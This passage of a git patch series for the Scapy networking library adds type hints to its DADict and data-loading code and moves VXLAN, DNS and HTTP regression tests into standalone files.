+ List, + TypeVar, + Union, + cast, + _Generic_metaclass, +) + ############################### # Direct Access dictionary # ############################### def fixname(x): + # type: (Union[bytes, str]) -> str """ Modifies a string to make sure it can be used as an attribute name. """ @@ -38,7 +51,12 @@ class DADict_Exception(Scapy_Exception): pass -class DADict(object): +_K = TypeVar('_K') # Key type +_V = TypeVar('_V') # Value type + + +@six.add_metaclass(_Generic_metaclass) +class DADict(Generic[_K, _V]): """ Direct Access Dictionary @@ -55,64 +73,84 @@ class DADict(object): ETHER_TYPES.IPv4 -> 2048 """ def __init__(self, _name="DADict", **kargs): + # type: (str, **Any) -> None self._name = _name + self.d = {} # type: Dict[_K, _V] self.update(kargs) def ident(self, v): + # type: (_V) -> str """ Return value that is used as key for the direct access """ - return fixname(v) + if isinstance(v, (str, bytes)): + return fixname(v) + return "unknown" def update(self, *args, **kwargs): + # type: (*Dict[str, _V], **Dict[str, _V]) -> None for k, v in six.iteritems(dict(*args, **kwargs)): self[k] = v def iterkeys(self): - for x in six.iterkeys(self.__dict__): + # type: () -> Iterator[_K] + for x in six.iterkeys(self.d): if not isinstance(x, str) or x[0] != "_": yield x def keys(self): + # type: () -> List[_K] return list(self.iterkeys()) def __iter__(self): + # type: () -> Iterator[_K] return self.iterkeys() def itervalues(self): - return six.itervalues(self.__dict__) + # type: () -> Iterator[_V] + return six.itervalues(self.d) # type: ignore def values(self): + # type: () -> List[_V] return list(self.itervalues()) def _show(self): + # type: () -> None for k in self.iterkeys(): print("%10s = %r" % (k, self[k])) def __repr__(self): + # type: () -> str return "<%s - %s elements>" % (self._name, len(self)) def __getitem__(self, attr): - return self.__dict__[attr] + # type: (_K) -> _V + return self.d[attr] def __setitem__(self, attr, val): - self.__dict__[attr] = val + # type: (_K, _V) -> None + self.d[attr] = val def __len__(self): - return len(self.__dict__) + # type: () -> int + return len(self.d) def __nonzero__(self): + # type: () -> bool # Always has at least its name return len(self) > 1 __bool__ = __nonzero__ def __getattr__(self, attr): + # type: (str) -> _K try: - return object.__getattribute__(self, attr) + return object.__getattribute__(self, attr) # type: ignore except AttributeError: - for k, v in six.iteritems(self.__dict__): + for k, v in six.iteritems(self.d): if self.ident(v) == attr: - return k + return cast(_K, k) + raise AttributeError def __dir__(self): + # type: () -> List[str] return [self.ident(x) for x in self.itervalues()] diff --git a/scapy/data.py b/scapy/data.py index 9279012269a..2cad3259d3d 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -19,6 +19,17 @@ from scapy.compat import plain_str import scapy.modules.six as six +from scapy.compat import ( + Any, + Callable, + Dict, + Iterator, + List, + Optional, + Tuple, + cast, +) + ############ # Consts # @@ -273,12 +284,15 @@ } -def load_protocols(filename, _fallback=None, _integer_base=10, _cls=DADict): +def load_protocols(filename, _fallback=None, _integer_base=10, + _cls=DADict[int, str]): + # type: (str, Optional[bytes], int, type) -> DADict[int, str] """"Parse /etc/protocols and return values as a dictionary.""" spaces = re.compile(b"[ \t]+|\n") - dct = _cls(_name=filename) + dct = _cls(_name=filename) # type: DADict[int, str] def _process_data(fdesc): + # type: (Iterator[bytes]) -> None for line in fdesc: try: shrp = line.find(b"#") @@ -305,16 +319,17 @@ def _process_data(fdesc): _process_data(fdesc) except IOError: if _fallback: - _process_data(_fallback.split(b"\n")) + _process_data(iter(_fallback.split(b"\n"))) else: log_loading.info("Can't open %s file", filename) return dct -class EtherDA(DADict): +class EtherDA(DADict[int, str]): # Backward compatibility: accept # ETHER_TYPES["MY_GREAT_TYPE"] = 12 def __setitem__(self, attr, val): + # type: (int, str) -> None if isinstance(attr, str): attr, val = val, attr warnings.warn( @@ -324,6 +339,7 @@ def __setitem__(self, attr, val): super(EtherDA, self).__setitem__(attr, val) def __getitem__(self, attr): + # type: (int) -> Any if isinstance(attr, str): warnings.warn( "Please use 'ETHER_TYPES.%s'" % attr, @@ -334,19 +350,22 @@ def __getitem__(self, attr): def load_ethertypes(filename): + # type: (Optional[str]) -> EtherDA """"Parse /etc/ethertypes and return values as a dictionary. If unavailable, use the copy bundled with Scapy.""" from scapy.libs.ethertypes import DATA - return load_protocols(filename or "Scapy's backup ETHER_TYPES", + prot = load_protocols(filename or "Scapy's backup ETHER_TYPES", _fallback=DATA, _integer_base=16, _cls=EtherDA) + return cast(EtherDA, prot) def load_services(filename): + # type: (str) -> Tuple[DADict[int, str], DADict[int, str]] spaces = re.compile(b"[ \t]+|\n") - tdct = DADict(_name="%s-tcp" % filename) - udct = DADict(_name="%s-udp" % filename) + tdct = DADict(_name="%s-tcp" % filename) # type: DADict[int, str] + udct = DADict(_name="%s-udp" % filename) # type: DADict[int, str] try: with open(filename, "rb") as fdesc: for line in fdesc: @@ -387,32 +406,38 @@ def load_services(filename): return tdct, udct -class ManufDA(DADict): +class ManufDA(DADict[str, Tuple[str, str]]): def ident(self, v): + # type: (Any) -> str return fixname(v[0] if isinstance(v, tuple) else v) def _get_manuf_couple(self, mac): + # type: (str) -> Tuple[str, str] oui = ":".join(mac.split(":")[:3]).upper() - return self.__dict__.get(oui, (mac, mac)) + return self.d.get(oui, (mac, mac)) def _get_manuf(self, mac): + # type: (str) -> str return self._get_manuf_couple(mac)[1] def _get_short_manuf(self, mac): + # type: (str) -> str return self._get_manuf_couple(mac)[0] def _resolve_MAC(self, mac): + # type: (str) -> str oui = ":".join(mac.split(":")[:3]).upper() if oui in self: return ":".join([self[oui][0]] + mac.split(":")[3:]) return mac def lookup(self, mac): + # type: (str) -> Tuple[str, str] """Find OUI name matching to a MAC""" - oui = ":".join(mac.split(":")[:3]).upper() - return self[oui] + return self._get_manuf_couple(mac) def reverse_lookup(self, name, case_sensitive=False): + # type: (str, bool) -> Dict[str, str] """ Find all MACs registered to a OUI @@ -421,14 +446,15 @@ def reverse_lookup(self, name, case_sensitive=False): :returns: a dict of mac:tuples (Name, Extended Name) """ if case_sensitive: - filtr = lambda x, l: any(x == z for z in l) + filtr = lambda x, l: any(x in z for z in l) # type: Callable[[str, Tuple[str, str]], bool] # noqa: E501 else: name = name.lower() - filtr = lambda x, l: any(x == z.lower() for z in l) - return {k: v for k, v in six.iteritems(self.__dict__) + filtr = lambda x, l: any(x in z.lower() for z in l) + return {k: v for k, v in six.iteritems(self.d) if filtr(name, v)} def __dir__(self): + # type: () -> List[str] return [ "_get_manuf", "_get_short_manuf", @@ -439,6 +465,7 @@ def __dir__(self): def load_manuf(filename): + # type: (str) -> ManufDA """ Loads manuf file from Wireshark. @@ -465,11 +492,13 @@ def load_manuf(filename): def select_path(directories, filename): + # type: (List[str], str) -> Optional[str] """Find filename among several directories""" for directory in directories: path = os.path.join(directory, filename) if os.path.exists(path): return path + return None if WINDOWS: @@ -501,13 +530,16 @@ def select_path(directories, filename): class KnowledgeBase: def __init__(self, filename): + # type: (Optional[Any]) -> None self.filename = filename - self.base = None + self.base = None # type: Optional[str] def lazy_init(self): + # type: () -> None self.base = "" def reload(self, filename=None): + # type: (Optional[Any]) -> None if filename is not None: self.filename = filename oldbase = self.base @@ -517,6 +549,7 @@ def reload(self, filename=None): self.base = oldbase def get_base(self): + # type: () -> str if self.base is None: self.lazy_init() - return self.base + return cast(str, self.base) diff --git a/scapy/fields.py b/scapy/fields.py index 6ac03ae9d45..34950578352 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -784,11 +784,11 @@ def i2m(self, pkt, x): # type: (Optional[BasePacket], Optional[str]) -> bytes if x is None: x = "::" - return inet_pton(socket.AF_INET6, plain_str(x)) # type: ignore + return inet_pton(socket.AF_INET6, plain_str(x)) def m2i(self, pkt, x): # type: (Optional[BasePacket], bytes) -> str - return inet_ntop(socket.AF_INET6, x) # type: ignore + return inet_ntop(socket.AF_INET6, x) def any2i(self, pkt, x): # type: (Optional[BasePacket], Optional[str]) -> str @@ -2214,7 +2214,7 @@ class _EnumField(Field[Union[List[I], I], I]): def __init__(self, name, # type: str default, # type: Optional[I] - enum, # type: Union[Dict[I, str], List[str], DADict, Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 + enum, # type: Union[Dict[I, str], List[str], DADict[I, str], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 fmt="H", # type: str ): # type: (...) -> None @@ -2234,7 +2234,7 @@ def __init__(self, internal value from and to machine representation. """ if isinstance(enum, ObservableDict): - enum.observe(self) + cast(ObservableDict, enum).observe(self) if isinstance(enum, tuple): self.i2s_cb = enum[0] # type: Optional[Callable[[I], str]] @@ -2327,7 +2327,7 @@ class CharEnumField(EnumField[str]): def __init__(self, name, # type: str default, # type: str - enum, # type: Union[Dict[str, str], Tuple[Callable[[BasePacket], str], ...]] # noqa: E501 + enum, # type: Union[Dict[str, str], Tuple[Callable[[str], str], Callable[[str], str]]] # noqa: E501 fmt="1s", # type: str ): # type: (...) -> None @@ -2375,7 +2375,7 @@ class ShortEnumField(EnumField[int]): def __init__(self, name, # type: str default, # type: int - enum, # type: Union[Dict[int, str], Tuple[Callable[[BasePacket], int], ...], DADict] # noqa: E501 + enum, # type: Union[Dict[int, str], Tuple[Callable[[int], str], Callable[[str], int]], DADict[int, str]] # noqa: E501 ): # type: (...) -> None EnumField.__init__(self, name, default, enum, "H") diff --git a/scapy/pton_ntop.py b/scapy/pton_ntop.py index e57da17dd26..ba023a7726f 100644 --- a/scapy/pton_ntop.py +++ b/scapy/pton_ntop.py @@ -17,11 +17,17 @@ from scapy.modules.six.moves import range from scapy.compat import plain_str, hex_bytes, bytes_encode, bytes_hex +from scapy.compat import ( + AddressFamily, + Union, +) + _IP6_ZEROS = re.compile('(?::|^)(0(?::0)+)(?::|$)') _INET6_PTON_EXC = socket.error("illegal IP address string passed to inet_pton") def _inet6_pton(addr): + # type: (str) -> bytes """Convert an IPv6 address from text representation into binary form, used when socket.inet_pton is not available. @@ -79,6 +85,7 @@ def _inet6_pton(addr): def inet_pton(af, addr): + # type: (AddressFamily, Union[bytes, str]) -> bytes """Convert an IP address from text representation into binary form.""" # Will replace Net/Net6 objects addr = plain_str(addr) @@ -93,6 +100,7 @@ def inet_pton(af, addr): def _inet6_ntop(addr): + # type: (bytes) -> str """Convert an IPv6 address from binary form into text representation, used when socket.inet_pton is not available. @@ -125,6 +133,7 @@ def _inet6_ntop(addr): def inet_ntop(af, addr): + # type: (AddressFamily, bytes) -> str """Convert an IP address from binary form into text representation.""" # Use inet_ntop if available addr = bytes_encode(addr) diff --git a/test/regression.uts b/test/regression.uts index 8f0a37f0eb7..1c11430a1db 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -10062,7 +10062,7 @@ os.write(fd, b"-- MIB test\nscapy OBJECT IDENTIFIER ::= {test 2807}\n") os.close(fd) load_mib(fname) -assert(sum(1 for k in six.itervalues(conf.mib.__dict__) if "scapy" in k) == 1) +assert(sum(1 for k in six.itervalues(conf.mib.d) if "scapy" in k) == 1) assert(sum(1 for oid in conf.mib) > 100) From 0c7fb834f5fb85d0f5115943dd04bcfcc3b2aa6f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 24 Oct 2020 09:37:01 +0200 Subject: [PATCH 0351/1632] Renaming DNS related unit tests files --- test/{dnssecRR.uts => scapy/layers/dns_dnssec.uts} | 0 test/{edns0.uts => scapy/layers/dns_edns0.uts} | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename test/{dnssecRR.uts => scapy/layers/dns_dnssec.uts} (100%) rename test/{edns0.uts => scapy/layers/dns_edns0.uts} (100%) diff --git a/test/dnssecRR.uts b/test/scapy/layers/dns_dnssec.uts similarity index 100% rename from test/dnssecRR.uts rename to test/scapy/layers/dns_dnssec.uts diff --git a/test/edns0.uts b/test/scapy/layers/dns_edns0.uts similarity index 100% rename from test/edns0.uts rename to test/scapy/layers/dns_edns0.uts From 1b0f97444a1932f27c8c9d6d3fed0bff2d684e66 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 24 Oct 2020 11:03:57 +0200 Subject: [PATCH 0352/1632] Remove a swp file --- test/.ipsec.uts.swp | Bin 16384 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 test/.ipsec.uts.swp diff --git a/test/.ipsec.uts.swp b/test/.ipsec.uts.swp deleted file mode 100644 index eb93d54d7599512d1d4de359f53cea960bc3df0a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 Ut1BbaSWTNMdaq9d;^o%(C(tt_>Hq)$ From 31468447d54898f1e5cbf5d1dcc54a83b70c830f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 25 Oct 2020 18:08:13 +0100 Subject: [PATCH 0353/1632] Standalone VXLAN unit tests Co-authored-by: Allain Legacy Co-authored-by: Florian Maury Co-authored-by: Gabriel Potter Co-authored-by: StrydeAlpha Co-authored-by: Robin Jarry Co-authored-by: Pierre Lalet , --- test/regression.uts | 85 ----------------------------------- test/scapy/layers/vxlan.uts | 89 +++++++++++++++++++++++++++++++++++++ 2 files changed, 89 insertions(+), 85 deletions(-) create mode 100644 test/scapy/layers/vxlan.uts diff --git a/test/regression.uts b/test/regression.uts index e48681ab944..ed891e6c8b4 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -8561,91 +8561,6 @@ assert(p.data[0].unmask == "255.0.0.0") assert(p.data[0].ifname.startswith(b"lo")) -############ -############ -+ VXLAN layer - -= Build a VXLAN packet with VNI of 42 -raw(UDP(sport=1024, dport=4789, len=None, chksum=None)/VXLAN(flags=0x08, vni=42)) == b'\x04\x00\x12\xb5\x00\x10\x00\x00\x08\x00\x00\x00\x00\x00\x2a\x00' - -= Verify VXLAN Ethernet Binding -pkt = VXLAN(raw(VXLAN(vni=23)/Ether(dst="11:11:11:11:11:11", src="11:11:11:11:11:11", type=0x800))) -pkt.flags.NextProtocol and pkt.NextProtocol == 3 - -= Verify UDP dport overloading -p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") -p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) -p /= VXLAN(flags=0xC, vni=42, NextProtocol=0) / Ether() / IP() -p = Ether(raw(p)) -assert(p[UDP].dport == 4789) -assert(p[Ether:2].type == 0x800) - -= Build a VXLAN packet with next protocol field -p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") -p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) -p /= VXLAN(flags=0xC, vni=42, NextProtocol=3) / Ether() / IP() -p = Ether(raw(p)) -assert(p[UDP].dport == 4789) -assert(p[VXLAN].reserved0 == 0x0) -assert(p[VXLAN].NextProtocol == 3) -assert(p[Ether:2].type == 0x800) - -= Build a VXLAN packet with no group policy ID -p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") -p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) -p /= VXLAN(flags=0xC, vni=42) / Ether() / IP() -p = Ether(raw(p)) -assert(p[VXLAN].reserved2 == 0x0) -assert(p[VXLAN].gpid is None) -assert(p[Ether:2].type == 0x800) - -= Build a VXLAN packet with group policy ID = 42 -p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") -p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) -p /= VXLAN(flags=0x8C, gpid=42, vni=42) / Ether() / IP() -p = Ether(raw(p)) -assert(p[VXLAN].gpid == 42) -assert(p[VXLAN].reserved1 is None) -assert(p[Ether:2].type == 0x800) - -= Build a VXLAN packet followed by and IP or IPv6 layer -etherproto = 0x0 -ipproto = 0x1 -ipv6proto = 0x2 -iptest = "192.168.20.20" -ipv6test = "659f:2c23:565:3fab:32d5:bb95:a0ed:2e3b" - -expkt = UDP() / VXLAN() / IP(dst=iptest) / "testing" -expkt = UDP(bytes(expkt)) -assert(expkt[VXLAN].NextProtocol == ipproto) -assert(IP in expkt) -assert(expkt[IP].dst == iptest) - -expkt = UDP() / VXLAN() / IPv6(dst=ipv6test) / "testing" -expkt = UDP(bytes(expkt)) -assert(expkt[VXLAN].NextProtocol == ipv6proto) -assert(IPv6 in expkt) -assert(expkt[IPv6].dst == ipv6test) - -expkt = UDP() / VXLAN(flags=0x4, NextProtocol=ipproto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" -expkt = UDP(bytes(expkt)) -assert(IP in expkt) - -expkt = UDP() / VXLAN(flags=0x4, NextProtocol=ipv6proto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" -expkt = UDP(bytes(expkt)) -assert(IPv6 in expkt) - -expkt = UDP() / VXLAN(flags=0x4, NextProtocol=etherproto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" -expkt = UDP(bytes(expkt)) -assert(Ether in expkt) - -= Dissect VXLAN with no NextProtocol -pkt = VXLAN(b'\x08\x00\x00\x00\x00"H\x00\xcaF\xae\x10\xed\x0f\x0c\x00\x00\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02\x0c\x00\x00\x00\x00\x00\x7f\xff\xff\xfe\x11"3DUf\x7f\x00\x00\x02') - -assert pkt.NextProtocol is None -assert Ether in pkt -assert ARP in pkt - ############ ############ ############ diff --git a/test/scapy/layers/vxlan.uts b/test/scapy/layers/vxlan.uts new file mode 100644 index 00000000000..a697e4b62d6 --- /dev/null +++ b/test/scapy/layers/vxlan.uts @@ -0,0 +1,89 @@ +% VXLAN regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ VXLAN layer + += Build a VXLAN packet with VNI of 42 +raw(UDP(sport=1024, dport=4789, len=None, chksum=None)/VXLAN(flags=0x08, vni=42)) == b'\x04\x00\x12\xb5\x00\x10\x00\x00\x08\x00\x00\x00\x00\x00\x2a\x00' + += Verify VXLAN Ethernet Binding +pkt = VXLAN(raw(VXLAN(vni=23)/Ether(dst="11:11:11:11:11:11", src="11:11:11:11:11:11", type=0x800))) +pkt.flags.NextProtocol and pkt.NextProtocol == 3 + += Verify UDP dport overloading +p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") +p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) +p /= VXLAN(flags=0xC, vni=42, NextProtocol=0) / Ether() / IP() +p = Ether(raw(p)) +assert(p[UDP].dport == 4789) +assert(p[Ether:2].type == 0x800) + += Build a VXLAN packet with next protocol field +p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") +p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) +p /= VXLAN(flags=0xC, vni=42, NextProtocol=3) / Ether() / IP() +p = Ether(raw(p)) +assert(p[UDP].dport == 4789) +assert(p[VXLAN].reserved0 == 0x0) +assert(p[VXLAN].NextProtocol == 3) +assert(p[Ether:2].type == 0x800) + += Build a VXLAN packet with no group policy ID +p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") +p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) +p /= VXLAN(flags=0xC, vni=42) / Ether() / IP() +p = Ether(raw(p)) +assert(p[VXLAN].reserved2 == 0x0) +assert(p[VXLAN].gpid is None) +assert(p[Ether:2].type == 0x800) + += Build a VXLAN packet with group policy ID = 42 +p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") +p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) +p /= VXLAN(flags=0x8C, gpid=42, vni=42) / Ether() / IP() +p = Ether(raw(p)) +assert(p[VXLAN].gpid == 42) +assert(p[VXLAN].reserved1 is None) +assert(p[Ether:2].type == 0x800) + += Build a VXLAN packet followed by and IP or IPv6 layer +etherproto = 0x0 +ipproto = 0x1 +ipv6proto = 0x2 +iptest = "192.168.20.20" +ipv6test = "659f:2c23:565:3fab:32d5:bb95:a0ed:2e3b" + +expkt = UDP() / VXLAN() / IP(dst=iptest) / "testing" +expkt = UDP(bytes(expkt)) +assert(expkt[VXLAN].NextProtocol == ipproto) +assert(IP in expkt) +assert(expkt[IP].dst == iptest) + +expkt = UDP() / VXLAN() / IPv6(dst=ipv6test) / "testing" +expkt = UDP(bytes(expkt)) +assert(expkt[VXLAN].NextProtocol == ipv6proto) +assert(IPv6 in expkt) +assert(expkt[IPv6].dst == ipv6test) + +expkt = UDP() / VXLAN(flags=0x4, NextProtocol=ipproto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" +expkt = UDP(bytes(expkt)) +assert(IP in expkt) + +expkt = UDP() / VXLAN(flags=0x4, NextProtocol=ipv6proto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" +expkt = UDP(bytes(expkt)) +assert(IPv6 in expkt) + +expkt = UDP() / VXLAN(flags=0x4, NextProtocol=etherproto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" +expkt = UDP(bytes(expkt)) +assert(Ether in expkt) + += Dissect VXLAN with no NextProtocol +pkt = VXLAN(b'\x08\x00\x00\x00\x00"H\x00\xcaF\xae\x10\xed\x0f\x0c\x00\x00\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02\x0c\x00\x00\x00\x00\x00\x7f\xff\xff\xfe\x11"3DUf\x7f\x00\x00\x02') + +assert pkt.NextProtocol is None +assert Ether in pkt +assert ARP in pkt From 53edcb4ad818c7f322c8b1e2051b50e343cb5a90 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 25 Oct 2020 10:56:57 +0100 Subject: [PATCH 0354/1632] Standalone HTTP unit tests Co-authored-by: Gabriel Co-authored-by: P. Chen Co-authored-by: 2xyo --- test/regression.uts | 236 ------------------------------------- test/scapy/layers/http.uts | 236 +++++++++++++++++++++++++++++++++++++ 2 files changed, 236 insertions(+), 236 deletions(-) create mode 100644 test/scapy/layers/http.uts diff --git a/test/regression.uts b/test/regression.uts index ed891e6c8b4..bf7587a2b61 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6073,242 +6073,6 @@ assert bytes_hex(bytes(buffer)) == b'0070696e6b696500706965' assert len(buffer) == 11 assert buffer -= TCPSession - dissect HTTP 1.0 chunked image -~ http - -load_layer("http") - -import os - -tmp = "/test/pcaps/http_chunk.pcap.gz" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -a = sniff(offline=filename, session=TCPSession) - -a[2].show() -assert HTTPRequest in a[2] -assert a[2].Path == b'/httpgallery/chunked/chunkedimage.aspx?0.2911017199439567' -assert a[2].Accept_Encoding == b'gzip, deflate' -assert a[2].Accept == b'image/webp,image/apng,image/*,*/*;q=0.8' -assert a[2].Http_Version == b'HTTP/1.1' -assert a[2].Referer == b'http://www.httpwatch.com/httpgallery/chunked/' - -a[29].show() -assert HTTPResponse in a[29] -assert a[29].Transfer_Encoding == b"chunked" -assert a[29].Content_Type == b'image/jpeg; charset=utf-8' -assert a[29].Http_Version == b'HTTP/1.1' -assert a[29].Status_Code == b"200" -assert a[29].Reason_Phrase == b"OK" -assert len(a[29].load) == 33653 -# According to wireshark: -wireshark_data = b'/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAAA8AAD/7QAsUGhvdG9zaG9wIDMuMAA4QklNBCUAAAAAABAAAAAAAAAAAAAAAAAAAAAA/+4ADkFkb2JlAGTAAAAAAf/bAIQABgQEBAUEBgUFBgkGBQYJCwgGBggLDAoKCwoKDBAMDAwMDAwQDA4PEA8ODBMTFBQTExwbGxscHx8fHx8fHx8fHwEHBwcNDA0YEBAYGhURFRofHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8f/8AAEQgCtwKdAwERAAIRAQMRAf/EAaIAAAAHAQEBAQEAAAAAAAAAAAQFAwIGAQAHCAkKCwEAAgIDAQEBAQEAAAAAAAAAAQACAwQFBgcICQoLEAACAQMDAgQCBgcDBAIGAnMBAgMRBAAFIRIxQVEGE2EicYEUMpGhBxWxQiPBUtHhMxZi8CRygvElQzRTkqKyY3PCNUQnk6OzNhdUZHTD0uIIJoMJChgZhJRFRqS0VtNVKBry4/PE1OT0ZXWFlaW1xdXl9WZ2hpamtsbW5vY3R1dnd4eXp7fH1+f3OEhYaHiImKi4yNjo+Ck5SVlpeYmZqbnJ2en5KjpKWmp6ipqqusra6voRAAICAQIDBQUEBQYECAMDbQEAAhEDBCESMUEFURNhIgZxgZEyobHwFMHR4SNCFVJicvEzJDRDghaSUyWiY7LCB3PSNeJEgxdUkwgJChgZJjZFGidkdFU38qOzwygp0+PzhJSktMTU5PRldYWVpbXF1eX1RlZmdoaWprbG1ub2R1dnd4eXp7fH1+f3OEhYaHiImKi4yNjo+DlJWWl5iZmpucnZ6fkqOkpaanqKmqq6ytrq+v/aAAwDAQACEQMRAD8A9U4q7FXYq7FXYq7FXYq7FX